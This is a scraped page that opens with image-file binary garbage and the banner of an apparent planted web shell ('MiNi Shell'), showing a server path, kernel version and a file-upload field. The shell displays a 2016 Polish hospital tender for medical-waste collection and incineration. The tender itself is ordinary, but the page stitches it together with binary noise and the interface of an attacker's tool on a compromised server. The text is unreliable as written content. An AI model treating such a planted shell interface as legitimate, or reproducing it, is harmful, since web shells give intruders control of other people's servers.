JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160115/10620-N-2016.html

<p class="kh_header"><b>Bełchatów: Usługi w zakresie odbioru, transportu i unieszkodliwiania termicznego odpadów medycznych i medycznych niebezpiecznych</b><br>
<b>Numer ogłoszenia: 10620 - 2016; data zamieszczenia: 15.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki im. Jana Pawła II , ul. Czapliniecka 123, 97-400 Bełchatów, woj. łódzkie, tel. 044 6358236, faks (0-44) 63 58 208.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie odbioru, transportu i unieszkodliwiania termicznego odpadów medycznych i medycznych niebezpiecznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Przedmiotem zamówienia publicznego są usługi w zakresie odbioru, transportu 
i unieszkodliwiania termicznego odpadów medycznych i medycznych niebezpiecznych  dla Szpitala Wojewódzkiego im. Jana Pawła II w Bełchatowie. 
2.      	Kod i nazwa według Wspólnego Słownika Zamówień (CPV): 
	90.50.00.00-2 Usługi związane z odpadami
	90.51.10.00-2 Usługi wywozu odpadów
	90.51.20.00-9 Usługi transportu odpadów
	90.51.33.00-9 Usługi spalania odpadów 
3.         Opis, wielkość i zakres przedmiotu zamówienia:
1.	Przedmiotem zamówienia są usługi polegające na odbiorze, transporcie i unieszkodliwianiu termicznym odpadów medycznych i medycznych niebezpiecznych Szpitala Wojewódzkiego im. Jana Pawła II w Bełchatowie zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 r. (Dz. U. 2013 poz. 21) przez firmę posiadającą zezwolenie na gospodarowanie tymi odpadami wraz z dostawą pojemników na odpady oraz jednorazowych worków foliowych, które Wykonawca zapewni Zamawiającemu na okres trwania umowy.
2.	Szacunkowa ilość odpadów medycznych wynosi około 201 168 kg w okresie obowiązywania umowy (12 miesięcy). Kody odpadów i ich przybliżona szacunkowa ilość: KOD [kg]/[m-c] 18 01 02* 260 18 01 03* 14508 18 01 04 1879 18 01 06* 24 18 01 08* 1 18 01 09 2 18 01 82* 90 Razem: 16764 *-odpady niebezpieczne
3.	Ilości określone w pkt 2) są szacunkowe i mogą ulec zmianie w zależności od faktycznego zużycia materiałów i powstających odpadów medycznych. 
4.	Zamówienie obejmuje wykonanie usługi odbioru, transportu i unieszkodliwiania termicznego odpadów medycznych i medycznych niebezpiecznych o następujących kodach:
Lp. Kod odpadu Rodzaj odpadu 1. 18 01 02* części ciała i organy oraz pojemniki na krew i konserwanty służące do jej przechowywania 
(z wyłączeniem 18 01 03)
2. 18 01 03* Inne odpady, które zawierają żywe drobnoustroje chorobotwórcze lub ich toksyny oraz inne formy zdolne do przeniesienia materiału genetycznego, o których wiadomo lub co do których istnieją wiarygodne podstawy do   sądzenia, że wywołują choroby u ludzi i zwierząt, z wyłączeniem 18 01 80* i 18 01 82*
3. 18 01 04 Inne odpady niż wymienione w 18 01 03
4. 18 01 06* chemikalia, w tym odczynniki chemiczne, zawierające substancje niebezpieczne
5. 18 01 08* leki cytotoksyczne i cytostatyczne
6. 18 01 09 leki inne niż wymienione w 18 01 08
7. 18 01 82* pozostałości z żywienia pacjentów oddziałów zakaźnych
*odpady niebezpieczne
	5.   	Odpady medyczne Zamawiającego zlokalizowane są przy budynkach Szpitala Wojewódzkiego im. Jana Pawła II w Bełchatowie, ul. Czapliniecka 123; tj. plac gospodarczy, plac koło budynku zakaźnego (pawilonu A), plac przy oddziale uzależnień (obok pawilonu C), plac koło budynku Patomorfologii (pawilon D).
	6.	Odbiór (załadunek) odpadów z miejsca ich magazynowania z siedziby Zamawiającego odbywa się 4 razy w tygodniu: poniedziałek, wtorek, czwartek i sobota
 w godz. 7:00 - 14: 00. Jeżeli wyniknie potrzeba wykonania dodatkowej usługi, odbiór odpadów dokonany musi być również na wezwanie telefoniczne, nie później niż w ciągu
 6 godzin od wezwania. W przypadku kiedy dzień odbioru odpadów wypada w dzień wolny od pracy, Wykonawca zobowiązany jest odebrać odpady w kolejnym roboczym dniu, jednak nie później niż do 72 godzin od ostatniego odbioru.
	7.	Transport odpadów medycznych oznakowanym pojazdem specjalnym, spełniającym wymogi do przewozu materiałów niebezpiecznych, posiadającym w tym względzie wszelkie upoważnienia zgodne z ustawa z 19 sierpnia 2011 r. o przewozie materiałów niebezpiecznych (Dz. U. z 2011 Nr 227 poz. 1367 ze zm.).
	8.	Unieszkodliwianie odpadów niebezpiecznych w miejscu wybranym przez Wykonawcę 
z zachowaniem wymagań ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. 2013 poz. 21 z dnia 8 stycznia 2013 r.), oraz ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2013 r. poz. 1232 z pózn. zm.), art. 143. 
	9. 	Wykonawca zobowiązany jest do ważenia odpadów na legalizowanej wadze w obecności Zamawiającego w chwili odbioru odpadów oraz do wystawienia każdorazowo w dwóch egzemplarzach Karty przekazania odpadów i jej wypełnienia (ilość odpadów zostanie wpisana w karcie przekazania odpadów). Każdorazowy odbiór odpadów medycznych potwierdzony będzie w Dziale administracyjno-gospodarczym.
  10.	Odpady medyczne zbierane będą do specjalnych pojemników dostarczonych i ustawionych na utwardzonej powierzchni przez Wykonawcę w uzgodnieniu z Zamawiającym.
11.  Wykonawca zaopatrzy Zamawiającego w zamykane pojemniki na kółkach o pojemności   
             660 litrów - w ilości 12 sztuk, lub 10 pojemników o pojemności 1100 litrów (wymagania jak   
             przy pojemnikach 660 litrów), które dostarczy i rozmieści na własny koszt według 
             nw.  schematu:
             a) 7/5 oznakowanych pojemników o pojemności 0,66 m3/1,1 m3 na placu (podwórze
gospodarcze) obok budynku głównego szpitala
             b) 3 oznakowane pojemniki  o pojemności 0,66 m3/1,1 m3 przy drodze między pawilonami 
  A-B;
             c) 1 oznakowany pojemnik o pojemności 0,66 m3/1,1 m3 przy pawilonie C;
             d) 1 oznakowany pojemnik o pojemności 0,66 m3/1,1 m3 obok budynku patomorfologii 
pawilon D.
12.  Od 1 dnia obowiązywania umowy Wykonawca podstawi opisane odpady medyczne  
                 pojemniki  w miejscu wskazanym przez Zamawiającego.
13.    Wykonawca będzie utrzymywał pojemniki w należytym stanie sanitarnym i technicznym.
14. Po stronie Wykonawcy pozostaje konserwacja, wymiana lub naprawa uszkodzonych    
pojemników. Zamawiający nie ponosi żadnych kosztów z tytułu kradzieży, zniszczenia bądź remontu tych pojemników.
15. 	Wykonawca zobowiązany jest do przekazania po każdym odbiorze wypełnionych 
i podpisanych kart przekazania odpadów z dokładnym oznaczeniem instalacji, w  której będą unieszkodliwione odpady z podaniem jej lokalizacji osobno dla każdego rodzaju kodu, według Rozporządzenia Ministra Środowiska z dnia 12 grudnia 2014 w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji (Dz. U. z 2014 poz. 1973), pod rygorem odstąpienia od umowy z przyczyn  leżących po stronie Wykonawcy.
16. Wykonawca ponosi wszystkie koszty związane z odbiorem, transportem, składowaniem 
     i unieszkodliwieniem odpadów medycznych.
17. Wykonawca zabezpieczy Zamawiającego w ramach realizacji przedmiotowej usługi 
          w  jednorazowe nieprzezroczyste, wytrzymałe na rozdarcie worki foliowe do końca trwania   
          umowy, zgodnie z szacunkowym miesięcznym zapotrzebowaniem Szpitala, w następujące   
          ilości:
1.	worki czerwone
- wielkie o wymiarach 100 cm x 100 cm x 2 - 125 szt.
- duże o wymiarach   70 cm x 110 cm x 2 - 6000 szt.
- małe  o wymiarach  50 cm x 60 cm x 2 -  8600 szt.
- małe o wymiarach   20-25cm x 40-50 cm - 260 szt.
2.	worki żółte
- duże o wymiarach  70 cm x 110 cm x 2 - 300 szt.
- małe o wymiarach  50 cm x 60 cm x 2 - 200 szt.
3.	worki niebieskie
- duże o wymiarach 70 cm x 110 cm x 2 - 2800 szt.
	- małe o wymiarach 50 cm x 60 cm x 2  - 1050 szt.
4.	worki zielone
- duże o wymiarach 70 cm x 110 cm x 2 - 700 szt.
5.	kubły (wiadra) twardo ścienne koloru czerwonego z zamykaną pokrywą na wcisk 
o poj. 90 litrów - 3 szt.
6.	kubły (wiadra) twardo ścienne koloru czerwonego z zamykaną pokrywą na wcisk 
o poj. 60 litrów - 4 szt.
7.	kubły (wiadra) twardo ścienne koloru czerwonego z zamykaną pokrywą na wcisk 
o poj. 30 litrów - 3 szt.
8.	Wykonawca zobowiązuje się również do zabezpieczenia oddziału obserwacyjno-zakaźnego w opakowania (pojemniki twardo ścienne koloru czerwonego, szczelnie zamykane na wcisk z uchwytem tak jak przy wiaderkach) do odpadów pożywieniowych. Miesięcznie Wykonawca dostarcza do magazynu odpadów 15 szt. pojemników 3 litrowych i 15 szt. pojemników 5 litrowych. Na każdym pojemniku musi być przyklejona biała etykieta o wymiarach nie mniejszych niż 10 cm x 5 cm na której można  wykonać zapisy zgodne z procedurą przyjętą w Szpitalu.
18.  Zakres obowiązków Wykonawcy:
a)	Zamawiający wymaga by unieszkodliwianie zakaźnych odpadów medycznych nie odbywało się we współspalarniach odpadów (art. 95 ust. 3 ustawy o odpadach  Dz. U. 2013 poz. 21),
b) 	Zamawiający wymaga, aby świadczenie usług stanowiących przedmiot zamówienia odbywało się zgodnie z obowiązującymi przepisami prawa na terenie Rzeczpospolitej Polskiej tj. uwzględniając treść rozdział 3 art. 20 ust. 4  ustawy o odpadach z dnia 14 grudnia 2012 roku (Dz. U. 2013 poz. 21) Zakazuje się przywozu na obszar województwa odpadów, o których mowa w ust. 3, wytworzonych poza obszarem tego województwa, do celów, o których mowa w ust. 3.
c)	Wykonawca musi posiadać uprawnienia do wykonywania działalności w zakresie objętym zamówieniem tj,. decyzję (pozwolenie)- załączyć do oferty.
d)	W oparciu o art. 95 ust. 4 i 5 ustawy z dnia 14 grudnia 2012 r. o odpadach Wykonawca do comiesięcznej faktury będzie załączał dokument potwierdzający unieszkodliwianie odpadów przez termiczne przekształcenie w spalarniach odpadów niebezpiecznych o kodach 18 01 02, 18 01 03, 18 01 82.
e)	Wykonawca obowiązany jest do świadczenia usług pry użyciu instalacji posiadającej wolne moce przerobowe. Oświadczenie w tym zakresie należy załączyć do oferty.

f)	W przypadku wygaśnięcia zezwolenia na transport i unieszkodliwianie odpadów 
w trakcie trwania umowy, Wykonawca zobowiązany jest niezwłocznie przedłożyć Zamawiającemu nowe zezwolenie, pod rygorem odstąpienia od umowy
 z przyczyn leżących po stronie Wykonawcy.
g)	Wykonawca powinien dysponować pracownikami zdolnymi do wykonania zamówienia
 tj. kierowcami z odpowiednim zaświadczeniem ADR - zgodnie z ustawą o przewozie towarów niebezpiecznych z dnia 28 października 2002 r. z póź. zm.  Dz.U. Nr 199, poz. 1671);
h)	Wykonawca powinien dysponować samochodami, których ładowność pozwoli na całościowe opróżnienie magazynu odpadów Zamawiającego,
i)	Zamawiający dopuszcza możliwość zlecenia przez Wykonawcę podwykonawstwa wyłącznie w zakresie odbioru i transportu odpadów. Niedopuszczalne jest podwykonawstwo w zakresie unieszkodliwiania odpadów objętych zamówieniem;
19. Ponadto Wykonawca zobowiązany jest do:
a)	unieszkodliwiania odpadów w zakładzie utylizacji o wydajności zapewniającej unieszkodliwianie odpadów odbieranych od Zamawiającego w ilościach podanych 
w SIWZ, w zakładzie utylizacji spełniającym wymogi o których mowa w art. 20 ust. 6 ustawy o odpadach (Dz. U. 2013, poz. 21, ze zm).
b)	spalania odpadów Zamawiającego w aktualnie eksploatowanej spalarni, która spełnia wymogi Rozporządzenia Ministra Środowiska z dnia 4 listopada 2008 r. z póź. zm. 
(Dz. U. z 2008 r. nr 206 poz. 1291 ze zm.) w sprawie wymagań w zakresie prowadzenia pomiarów wielkości emisji oraz pomiarów ilości pobranej wody i Rozporządzenia Ministra Środowiska z dnia 20 grudnia 2005 r. w sprawie standardów emisyjnych z instalacji (Dz. U. z 2005 r. nr 260 poz. 2181 ze zm.);
 20. 	Zamawiający zastrzega sobie prawo zmniejszenia zamówienia w przypadku reorganizacji zakładu.
 21.	Wykonawca powinien podać w ofercie informacje o lokalizacji (adres) spalarni 
do unieszkodliwiania odpadów medycznych i medycznych  niebezpiecznych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w zakresie do 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.33.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku warunku, o którym mowa w art. 22 ust. 1 pkt 1 ustawy Pzp,
 	 Zamawiający dokona oceny czy Wykonawca posiada uprawnienia 
     do wykonywania określonej działalności lub czynności. Warunek zostanie uznany 
     za spełniony jeżeli Wykonawca wykaże, że posiada decyzję (pozwolenie) 
     na prowadzenie działalności w zakresie transportu i unieszkodliwiania
     odpadów medycznych i medycznych niebezpiecznych lub pozwolenie
     zintegrowane wydane na postawie ustawy Prawo ochrony środowiska;
	 - na podstawie dokumentu, o którym mowa w Rozdziale VI pkt I 1. 1) SIWZ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku warunku, o którym mowa w art. 22 ust. 1 pkt 2 ustawy Pzp,
Zamawiający dokonana oceny czy Wykonawca posiada wiedzę i doświadczenie
związane z przedmiotem zamówienia. Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że wykonał lub wykonuje w okresie ostatnich trzech
lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie) co najmniej dwa zamówienia 
na usługi w zakresie transportu i unieszkodliwiania odpadów medycznych i medycznych niebezpiecznych o wielkości każdego z tych zamówień co najmniej 160 000 kg odpadów w okresie 12 miesięcy;
-   na podstawie dokumentu, o którym mowa w Rozdziale VI pkt I 1. 2) SIWZ;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku warunku, o którym mowa w art. 22 ust. 1 pkt 3 ustawy Pzp:
-	w części dotyczącej dysponowania odpowiednim potencjałem
  	technicznym Zamawiający nie formułuje szczegółowych wymagań. 
 	W tym zakresie Wykonawcę obowiązuje wyłącznie złożenie
  	oświadczenia o spełnianiu warunków udziału w postępowaniu, zgodnie 
 	z wymogiem określonym w Rozdziale V pkt 1 ppkt 2) SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku warunku, o którym mowa w art. 22 ust. 1 pkt 3 ustawy Pzp: w części dotyczącej dysponowania osobami zdolnymi do wykonania
  		zamówienia Zamawiający nie formułuje szczegółowych wymagań. 
 		W tym zakresie Wykonawcę obowiązuje wyłącznie złożenie
  		oświadczenia o spełnianiu warunków udziału w postępowaniu, zgodnie 
 		z wymogiem określonym w Rozdziale V pkt 1 ppkt 2) SIWZ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku warunku, o którym mowa w art. 22 ust. 1 pkt 4 ustawy Pzp,
Zamawiający dokona oceny czy Wykonawca spełnia warunek dotyczący sytuacji ekonomicznej i finansowej. Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę stanowiącą równowartość kwoty co najmniej 100.000, 00 zł brutto.
	 - na podstawie dokumentu, o którym mowa w Rozdziale VI pkt I 1. 3) SIWZ;

Jeżeli wartość zostanie podana w walutach innych niż PLN, Zamawiający przyjmie średni kurs PLN do tej
waluty podany przez NBP na dzień opublikowania ogłoszenia w Biuletynie Zamówień Publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający wymaga wskazania przez Wykonawcę w wykazie głównych usług wyłącznie zamówień należycie wykonanych, a w przypadku świadczeń okresowych lub ciągłych również należycie wykonywanych, w zakresie usług transportu i unieszkodliwiania odpadów medycznych i medycznych niebezpiecznych o wielkości każdego z tych zamówień co najmniej 160 000 kg odpadów w okresie 12 miesięcy.;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">5.	W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca zobowiązany jest do złożenia oświadczenia potwierdzającego, 
że instalacja przewidziana do świadczenia usług stanowiących przedmiot zamówienia posiada wolne moce przerobowe - wzór oświadczenia stanowi Załącznik nr 6 do SIWZ.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
